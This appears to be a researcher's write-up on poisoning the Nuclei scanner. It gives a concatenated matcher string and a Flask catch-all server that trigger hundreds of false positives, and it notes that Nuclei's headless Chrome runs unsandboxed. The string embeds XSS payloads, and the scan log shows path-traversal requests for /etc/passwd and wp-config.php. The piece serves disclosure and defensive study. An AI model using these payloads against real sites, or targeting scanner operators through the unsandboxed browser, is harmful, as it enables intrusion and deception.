support"><script>alert(document.domain)</script></sCripT><sCripT>alert(document.domain)</sCripT></script><script>alert(document.domain)</script></script><script>alert(document.domain)</script></script><script>alert(document.domain)</script></script><script>alert(document.domain)</script></script><script>alert(document.domain)</script></script><script>alert(document.domain)</script></script><script>alert(document.domain)</script></script><script>alert(document.domain)</script></script><script>alert(document.domain)</script></script><script>alert(document.domain)</script></script><script>alert(document.domain)</script></script><script>alert(document.domain)</script></script><script>alert(document.domain)</script>"></script><script>alert(document.domain)</script></script><script>alert(document.domain)</script></script><script>alert(document.domain)</script></script><script>alert(document.domain)</script></script><script>alert(document.domain)</script></script><script>alert(document.domain)</script></script><script>alert(document.domain)</script></script><script>alert(document.domain)</script></script><script>alert(document.domain)</script></script><script>alert(document.domain)</script></script><script>alert(document.domain)</script></script><script>alert(document.domain)</script><"</script><script>alert(document.domain)</script></script><script>alert(document.domain)</script>"><script>alert(document.domain);</script><"input
type="text"
name="ContactId"</script><script>alert(document.domain)</script></script><script>alert(document.domain)</script></script><script>alert(document.domain)</script></script><script>alert(document.domain)</script></script><script>alert(document.domain)</script>Nuclei:
CVE-2016-10960wp-login.php?checkemail=confirmapplication/json</script><script>alert(document.domain)</script></script><script>alert(document.domain)</script>text/htmlcf79ae6addba60ad018347359bd144d2</script><script>alert(document.domain)</script>httpPHP
Credits<script>alert('{{randstr}}')</script></script><script>alert(document.domain)</script></script><script>alert(document.domain)</script>http<script>confirm({{randstr}})</script>SIS-REWEhttpNetpDoDomainJoin:</script><script>alert(document.domain)</script>application/xml/Success.htm</script><script>alert(document.domain)</script>mec-eventstext/csvtext/plainWelcome
to your WordPress
DashboardcommandResultuid=http</script><script>alert(document.domain)</script>uid=gid=groups=http</script><script>alert(document.domain)</script>application/x-javascriptdef_wirelesspassword
=<title>Roteador
Wireless</title></script><script>alert(document.domain)</script>http<script>alert(document.domain)</script>application/json</script><script>alert(document.domain)</script></title><script>alert('{{randstr}}')</script>"HTTP_X_TRIGGER_XSS":"<script>alert(1)</script>"The
attribute valuejava.lang.UNIXProcess@has invalid value!"status" :
"400"XMLHttpRequest.prototype.open<p:StdOut>uid=0(root) gid=0(root)
groups=0returntagjidsaltwheelvRealize Operations ManagerthumbprintaddresshttpApache Server
StatusServer
Versiontext/html<script>alert(document.domain);</script>/wp-content/themes/realestateuid=gid=groups=VoIPmonitor
installationapplication/jsonIndex of /cache/backupParent Directory.sql.gz<script
type="text/javascript">var d = new
Date();window.parent.$("#mobLogo").attr("src","/temp/tempMobPreview.jpeg?"+d.getTime());window.parent.$("#tabLogo").attr("src","/temp/tempMobPreview.jpeg?"+d.getTime());</script>{{randstr}}.tldEXPONENT.PATHEXPONENT.URL"zlo
onerror=alert(1) "Device Status
Graphhttponmouseover="alert('nuclei')root_causetruncatedreasonfor 16-bit app supportJH 404
LoggerMicrosoft.Exchange.Clients.Owa2.Server.Core.OwaADUserNotFoundExceptionExchange MAPI/HTTP
Connectivity
Endpoint<SERIAL><VERSION>uidgidgroups</script><script>alert(document.domain)</script></script><script>alert(document.domain)</script></script><script>alert(document.domain)</script>httpinput/Autofocus/%0D*/Onfocus=alert(123);goto-tour-list-js-extra<str
name="status">OK</str>alert(document.domain);"zlo onerror=alert(1) "Device Status
Graph{"result":{"isDisconnected":text/html"zlo onerror=alert(1) "Device Status
Graph</script><script>alert(document.domain)</script>text/htmlnucleiNo policy has been
chosen.</script><script>alert(document.domain)</script>application/json</script><script>alert(document.domain)</script>syslog:admin/etc_ro/lighttpd/wwwhttp709b38b27304df6257a86a60df742c4c><svg/onload=alert(1)><Calendar
DetailsPHP ExtensionPHP
Version"></script><script>alert(document.domain)</script>application/pdffilename="dompdf_out.pdf"DB_NAMEDB_PASSWORD</textarea></script><script>alert(document.domain)</script></script><script>alert(document.domain)</script>'></script><script>alert(document.domain)</script>please
input shell commandZTE Corporation. All rights
reservedapplication/json<script>alert(1)</script>DB_NAMEDB_PASSWORDDB_USERDB_HOST<userauth><password>Level
was:
LEVEL15/WEB_VMS/LEVEL15/https://weiphp.cnWeiPHPDB_PREFIX"username":"anonymous""Administrator""newPassword":""Application
ServerManagement
ConsoleserverIdentifiercompanyNamehadoopVersionresourceManagerVersionBuiltOnxdebug.remote_connect_back</td><td
class="v">On</td><td class="v">On</td>"id":"version":"method":"url":"time":<title>Database
Error</title>Request URI: /examples/jsp/snp/snoop.jsp<fieldset id="adminaccount"><legend>Create
an <strong>admin account</strong></legend><legend><a id="showAdvanced" tabindex="0"
href="#">Storage & databaseapplication/jsonUnfortunately the article you are looking for
could not be found.dns"took":TCP/IP Configuration<title>Network - Plastic
SCM</title>httppool:process manager:start
time:pid:{"runs":[{"id":resource_references<title>Alertmanager</title>var db =
'information_schema';var opendb_url = 'db_structure.php';Welcome to Zenphoto! This page will set
up ZenphotoTraffic and system resource graphingMultimon: UPS Status PageContexts known to this
server are:{"Uri":"/worker","Method":"GET"}Monitoring JavaMelody onRack
Environment"roles""permissions""role""kv"<ListBucketResult xmlns=# -FrontPage-<title>Solr admin
page</title>scalarsloading_mechanismcustom_scalars<title>ViewPoint System
Status</title>HTTP_ACCEPTHTTP_ACCEPT_ENCODINGnode_cooling_devicenode_networkvti_extenderversion:FPVersion=<HEAD><TITLE>Display
file upload form to the user</TITLE></HEAD>Druid Stat Index</title>Apache Server StatusServer
VersionkibanaWelcomeViewcluster_uuidkibanaWelcomeLogokibanaWelcomeTitleJSP ExamplesJSP
SamplesServlets ExamplesWebSocket Examples<title>Home - Mongo Express</title><title>system.users
- Mongo Express</title>"ParentId":"Container":"Labels":PRTG Traffic
Grapher"repoKey""repositories":applicationNameserviceTypeaura:invalidSessionWhoops! There was
an error<title>Warning [refreshed every 30 sec.]</title>Popup
Uploadpython_gc_objects_collected_totalpython_infoUser sign up completed
successfully<title>Android Debug Database</title>autodiscover.interact.sh<title>phpMyAdmin
setup</title><title>Horde :: User Administration</title><title>200 Purged</title>"status":
"ok"<title>Kafdrop: Broker List</title>Kafka Cluster Overviewhttplsmkdir chmod mv nano vim
pico sudo cd cp ps aux URLconf definedPage not foundDjango tried these URL patterns, in this
orderAPCu Version InformationGeneral Cache InformationDetailed Memory Usage and
FragmentationContent-Type: application/json<title>JK Status
Manager</title><title>SQLiteManager</title>Create dashboardZabbix SIAStatistics Report for
HAProxyHP<h1>SNMP</h1>"><svg onload=confirm(document.domain)>Suggestions for improving the
resultsX-Debug-Token-Link:/_profiler/can_execute_commands":"a.":"A.title="~system"NetWeaverapiVersionOverview
- Kubernetes Resource ReportnamespaceHELPTYPEkubeapplication/json<title>Snippets · Explore ·
GitLab</title><a data-qa-selector="register_link" href="/users/sign_up">Register
now</a>data-qa-selector="new_user_register_button"Set-Cookie: _gitlab_session=Content-Type:
text/html<h1> Ooops. </h1>Traceback (most recent call last)Nginx Vhost Traffic
StatusHostZoneActive connections:<H1>OK</H1><title>Groovy Console</title>Run ScriptGroovy
Web
ConsolebuildCountdownloadNameacHandling"status""diskSpace""jms"mappingsmethodproducesthreadNamethreadIdwaitedTimelockNamestackTracemethodName"loggers""levels""build""artifact""type""beans""dependencies""scope"positiveMatchesAuditAutoConfiguration#auditListenerEndpointAutoConfiguration#beansEndpointorg.springframework.boot.actuatebeanscontexts"threads":"threadName":applicationConfigactiveProfiles"timestamp""info""method""path"memmem.freeprocessorsinstance.uptimesystemload.averagenonheap.initheap.committed"traces""timestamp""principal""session"package=Administrators
name:Support Administrators email address:Web-FTPsquare loginX-Jenkins<title>Froxlor Server
Management Panel</title><title>IBM HTTP
Server</title>access_keyterraform<title>OneBlog开源博客后台管理系统</title><title>Payara
Server - Server Running</title><!-- Element where elFinder will be created (REQUIRED)
-->Nexus Repository Manager<title>Strapi Admin</title><title>OWASP Juice
Shop</title>GraylogREST API browserswagger<title>Elasticsearch-sql
client</title><title>Dotclear</title>defaultmy_idroot_url<title>Sage
X3</title><title>GlassFish Server - Server Running</title><title>Daybyday -
Login</title><title>Centreon - IT & Network Monitoring</title><title>Test Page for the
Apache HTTP Server on Red Hat Enterprise Linux</title><title>Operations Automation Default
Page</title><title>Powered by lighttpd</title>"_links":"self":"health"<TITLE>Powered By
Jetty</TITLE>gotmls<title>Home Assistant</title><title>Test Page for the HTTP Server on
Fedora</title><TITLE>Olivetti CRF</TITLE><title>TurnKey NGINX PHP FastCGI
Server</title><title>Webmodule</title><title>SeedDMS: Sign in</title>urlArgs : "v=Sign in to
OpenAMForgeRockforgerockFRForgotUsernamesuccessfulUserRegistrationDestination"id":"wazuh""title":"Wazuh""icon":"plugins/wazuh/img/icon_blue.png""url":"/app/wazuh"var
nc_lastLogin<title>PHP-Proxy</title><title>Node-RED</title><a href="http://moinmo.in/"
title="This site uses the MoinMoin Wiki software.">MoinMoin Powered</a><a
href="http://moinmo.in/Python" title="MoinMoin is written in Python.">Python
Powered</a><a><b>XXL</b>JOB</a><title>AContent : Home</title>AContent - Copyright 2010 by
IDRC/IDI http://inclusivedesign.ca/<title>BookStack</title><span
class="logo-text">BookStack</span>Welcome to the Artica Web Administration Interface: Web
Accessibility Checker</title>AChecker - Copyrightoctober_session<title>Mautic</title><div
class="mautic-logoPowered by WonderCMShttps://www.wondercms.comrx_sesskey1Powered by
Gitea<title>YApi-高效、易用、功能强大的可视化接口管理平台</title><meta name="generator"
content="Plone - <div
xmlns:css="http://namespaces.plone.org/diazo/css"/++plone++static/plone-compiled.css/++plone++static/tinymce-styles.css>Powered
by Plone & Python</a>javax.faces.resourcejavax.faces.ViewState<title>Burp
API</title>Home Page - My ASP.NET Application<title>Ticket BBCode editor -
SCEditor</title>title="SCEditor"<title>Web Server's Default
Page</title><title>PhpCollab</title>Homepage | Gila CMS<meta name="generator" content="Gila
CMS">Powered by wuzhicms<h1>Interactive Console</h1>X-Powered-By: Craft CMS<title>openSIS
Student Information System</title><title>Authenticate Please!</title><form
action="/bolt/login"<img class="logo" alt="Bolt CMS logo"<img
src="/app/view/img/bolt-logo.png"<link rel="shortcut icon"
href="/app/view/img/favicon-bolt.ico"><link rel="stylesheet"
href="/app/view/css/bolt-old-ie.css"<link rel="stylesheet"
href="/app/view/css/bolt.css"<script src="/app/view/js/bolt.js"></script><script
src="/app/view/js/bolt.min.js"<script src="/assets/bolt.js"></script>Bolt requires
JavaScript to function properly and continuing without it might corrupt or erase data.Bolt »
LoginCookies are required to log on to Bolt. Please allow
cookies.<title>BigBlueButton</title><title>Harbor</title>iPlanet<title>json-web-services-api</title>There
are no services matching that phrase.Unable to deserialize
objectWebLogic<title>Opencast</title>name="application-name" content="Jellyfin"class="page
homePage libraryPage allLibraryPage backdropPage pageWithAbsoluteTabs withTabs"The Free
Software Media System<title>CrushFTP WebInterface</title><title>- AvantFAX -
Login</title><title>Jitsi Meet</title>Welcome to the BIG-IPConfiguration
Utility<title>Kibana</title>kibanaLoaderWrapkibanaLoaderxpackElasticsearch B.V<title>Rapid
web development with Lucee!</title><title>Jeedom</title><title>HTTP Server Test Page powered
by CentOS-WebPanel.com</title><title> eG Innovations, Inc.</title>eG Innovations, Inc. All
Rights ReservedPCoIP Connection Manager<title>druid monitor</title><title>Welcome to
OpenResty!</title><TITLE>Test Page for the SSL/TLS-aware Apache Installation on Web
Site</TITLE>rememberMe=deleteMe<title>HP BladeSystem Onboard
Administrator</title>Set-Cookie: grav-site-<title>iTop
login</title>"timestamp":"protocol":"agent":Realisiert mit ShopwareRealised with
ShopwareShopware Administration (c) shopware AG<title>Shopware 5 - Backend (c) shopware
AG</title>-Confluence--confluence-Welcome to Abyss Web Servermagmi_multifield"description"
:"The Pega APIX-Powered-By: ThinkCMFThis is a SOCKS
ProxyHTTPTunnelPortSOCKSPortversion.services.core.carbon.wso2.org<title>Hello! Welcome to
Synology Web Station!</title><li><a
href="http://docs.aws.amazon.com/elasticbeanstalk/latest/dg/Welcome.html">AWS Elastic
Beanstalk overview</a></li><li><a
href="http://docs.amazonwebservices.com/elasticbeanstalk/latest/dg/">AWS Elastic Beanstalk
overview</a></li>TIBCO Jaspersoft: LoginCould not login to JasperReports ServerAbout TIBCO
JasperReports Server<title>Login utilisateur Gespage</title><title>InfluxDB - Admin
Interface</title><title>The install worked successfully!
Congratulations!</title>CFG_GLPI_glpi_csrf_tokenGLPI CopyrightREDCapVanderbilt
UniversityThis error page was generated by SAP Web DispatcherBasic realm="WEB ADMIN"SAP
NetWeaver Application Serversap-system-login<title>Logon</title>SAP IGSis runningKubernetes
Enterprise ManagergitVersiongoVersionplatformMirantis Kubernetes EngineReport
Manager<title>Microsoft Azure App Service - Welcome</title><title>IIS Windows
Server</title><title>IIS7</title><title>Welcome to nginx!</title><title>Test Page for the
Nginx HTTP Server on Amazon Linux</title>RadAsyncUpload handler is registered
succesfullyOracle iPlanet Web Server<TITLE>Oracle Application Server Containers for J2EE
10g</TITLE><title>Oracle HTTP Server 12c</title><title>Oracle Database as a
Service</title><title>DBaaS Monitor</title>Could not parse auth
tokenx-goog-metagenerationX-Goog-MetagenerationValidateWelcomeAxisdeployedinstallationAdmin<title>Apache
TomcatApache TomcatApache Guacamole<title>Welcome to XAMPP</title>Airflow 404 = lots of
circles<title>Apache HTTP Server Test Page powered by CentOS</title><title>Apache2 Ubuntu
Default Page: It works</title><title>Apache2 Debian Default Page: It works</title>ColdFusion
documentation
(bit of overkill, I know)
Example of a false positive server :
# coding: utf-8
from flask import Flask, render_template
app = Flask(__name__, template_folder='.')
@app.route('/', defaults={'path': ''})
@app.route('/<path:path>')
def catch_all(path):
return BAD_NUCLEI_STRING_FROM_ABOVE
if __name__ == "__main__":
app.run(host='0.0.0.0', debug=True)
$ nuclei -u http://192.168.0.6:5000/
__ _
____ __ _______/ /__ (_)
/ __ \/ / / / ___/ / _ \/ /
/ / / / /_/ / /__/ / __/ /
/_/ /_/\__,_/\___/_/\___/_/ 2.5.2
projectdiscovery.io
[WRN] Use with caution. You are responsible for your actions.
[WRN] Developers assume no liability and are not responsible for any misuse or damage.
[INF] Using Nuclei Engine 2.5.2 (latest)
[INF] Using Nuclei Templates 8.5.4 (latest)
[INF] Using Interactsh Server https://interact.sh
[INF] Templates added in last update: 117
[INF] Templates loaded for scan: 2026
[INF] Templates clustered: 316 (Reduced 292 HTTP Requests)
[2021-09-28 09:04:37] [zhiyuan-file-upload] [http] [critical] http://192.168.0.6:5000/seeyon/thirdpartyController.do.css/..;/ajax.do
[2021-09-28 09:04:37] [tictail-takeover] [http] [high] http://192.168.0.6:5000/
[2021-09-28 09:04:37] [github-takeover] [http] [high] http://192.168.0.6:5000/
[2021-09-28 09:04:37] [addeventlistener-detect] [http] [info] http://192.168.0.6:5000/
[2021-09-28 09:04:37] [kinsta-takeover] [http] [high] http://192.168.0.6:5000/
[2021-09-28 09:04:37] [kubernetes-mirantis] [http] [info] http://192.168.0.6:5000/
[2021-09-28 09:04:37] [ambari-exposure] [http] [medium] http://192.168.0.6:5000/
[2021-09-28 09:04:37] [kubernetes-dashboard] [http] [low] http://192.168.0.6:5000/
[2021-09-28 09:04:37] [default-asp.net-page] [http] [info] http://192.168.0.6:5000/
[2021-09-28 09:04:37] [pingdom-takeover] [http] [high] http://192.168.0.6:5000/
[2021-09-28 09:04:37] [shopify-takeover] [http] [high] http://192.168.0.6:5000/
[2021-09-28 09:04:37] [jazzhr-takeover] [http] [high] http://192.168.0.6:5000/
[2021-09-28 09:04:37] [CVE-2018-7422] [http] [high] http://192.168.0.6:5000/wp-content/plugins/site-editor/editor/extensions/pagebuilder/includes/ajax_shortcode_pattern.php?ajax_path=../../../../../../../wp-config.php
[2021-09-28 09:04:37] [CVE-2018-7422] [http] [high] http://192.168.0.6:5000/wp-content/plugins/site-editor/editor/extensions/pagebuilder/includes/ajax_shortcode_pattern.php?ajax_path=/etc/passwd
[2021-09-28 09:04:37] [symantec-epm-login] [http] [info] http://192.168.0.6:5000/
[2021-09-28 09:04:37] [druid-console-exposure] [http] [medium] http://192.168.0.6:5000/
[2021-09-28 09:04:37] [hatenablog-takeover] [http] [high] http://192.168.0.6:5000/
[2021-09-28 09:04:37] [epmp-login] [http] [info] http://192.168.0.6:5000/
[2021-09-28 09:04:37] [bigbluebutton-detect] [http] [info] http://192.168.0.6:5000/
[2021-09-28 09:04:37] [wondercms-detect] [http] [info] http://192.168.0.6:5000/
[2021-09-28 09:04:37] [manageengine-assetexplorer] [http] [info] http://192.168.0.6:5000/
[2021-09-28 09:04:37] [owncloud-config] [http] [info] http://192.168.0.6:5000/owncloud/config/
[2021-09-28 09:04:37] [oracle-http-server-12c] [http] [info] http://192.168.0.6:5000/
[2021-09-28 09:04:37] [lucee-stack-trace] [http] [low] http://192.168.0.6:5000/
[2021-09-28 09:04:37] [worksites-takeover] [http] [high] http://192.168.0.6:5000/
[2021-09-28 09:04:37] [default-microsoft-azure-page] [http] [info] http://192.168.0.6:5000/
[2021-09-28 09:04:37] [wishpond-takeover] [http] [high] http://192.168.0.6:5000/
[2021-09-28 09:04:37] [iplanet-web-server] [http] [info] http://192.168.0.6:5000/
[2021-09-28 09:04:37] [manageengine-supportcenter] [http] [info] http://192.168.0.6:5000/
[2021-09-28 09:04:37] [manageengine-opmanager] [http] [info] http://192.168.0.6:5000/
[2021-09-28 09:04:37] [rocketmq-console-exposure] [http] [info] http://192.168.0.6:5000/
[2021-09-28 09:04:37] [flink-exposure] [http] [low] http://192.168.0.6:5000/
[2021-09-28 09:04:37] [wuzhicms-detect] [http] [info] http://192.168.0.6:5000/
[2021-09-28 09:04:37] [android-debug-database-exposed] [http] [low] http://192.168.0.6:5000/
[2021-09-28 09:04:37] [olivetti-crf-detect] [http] [info] http://192.168.0.6:5000/
[2021-09-28 09:04:37] [yapi-detect] [http] [info] http://192.168.0.6:5000/
[2021-09-28 09:04:37] [freshdesk-takeover] [http] [high] http://192.168.0.6:5000/
[2021-09-28 09:04:37] [aws-bucket-takeover] [http] [high] http://192.168.0.6:5000/
[2021-09-28 09:04:37] [simplebooklet-takeover] [http] [high] http://192.168.0.6:5000/
[2021-09-28 09:04:37] [kafka-monitoring] [http] [low] http://192.168.0.6:5000/
[2021-09-28 09:04:37] [default-nginx-page] [http] [info] http://192.168.0.6:5000/
[2021-09-28 09:04:37] [mashery-takeover] [http] [high] http://192.168.0.6:5000/
...
This continues for 800 lines ...
...
You can also do a Reverse Nuclei Proxy that identifies the incoming Nuclei request and outputs the expected template matcher. I started coding this, but the demonic string above is cooler and easier.
As seen above, the Headless Chrome of Nuclei runs WITHOUT the Sandbox.
previouspids := findChromeProcesses()
chromeLauncher := launcher.New().
Leakless(false).
Set("disable-gpu", "true").
Set("ignore-certificate-errors", "true").
Set("ignore-certificate-errors", "1").
Set("disable-crash-reporter", "true").
Set("disable-notifications", "true").
Set("hide-scrollbars", "true").
Set("window-size", fmt.Sprintf("%d,%d", 1080, 1920)).
Set("no-sandbox", "true").
Set("mute-audio", "true").
Set("incognito", "true").
Delete("use-mock-keychain").
UserDataDir(dataStore)
So every 1day on chrome will become a RCE on Nuclei. Dont ever run -headless I guess.
( ´ ▽ ` )/